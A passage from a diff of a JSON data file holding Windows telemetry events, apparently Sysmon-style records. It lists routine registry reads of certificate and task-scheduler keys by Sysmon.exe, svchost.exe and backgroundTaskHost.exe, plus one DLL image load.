2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_value": "{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ActivationType", - "registry_value": "ActivationType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Conditions", - "registry_value": "Conditions", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Flags", - "registry_value": "Flags", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\Name", - "registry_value": "Name", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TriggerEvent", - "registry_value": "TriggerEvent", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\TaskEntryPoint", - "registry_value": "TaskEntryPoint", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageRelativeAppName", - "registry_value": "PackageRelativeAppName", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PsmActivationType", - "registry_value": "PsmActivationType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\PackageFlags", - "registry_value": "PackageFlags", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\WorkItems\\{86322bf7-5d6f-42dd-88ec-023800d02ea8}\\ExtendedRegistrationData", - "registry_value": "ExtendedRegistrationData", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventType", - "registry_value": "EventType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventType", - "registry_value": "EventType", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691990000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "threadpoolwinrt.dll", - "image_path": "C:\\Windows\\System32\\threadpoolwinrt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", - "registry_value": "ContentDeliveryManager.Background.WatchdogTask", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571692150000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": 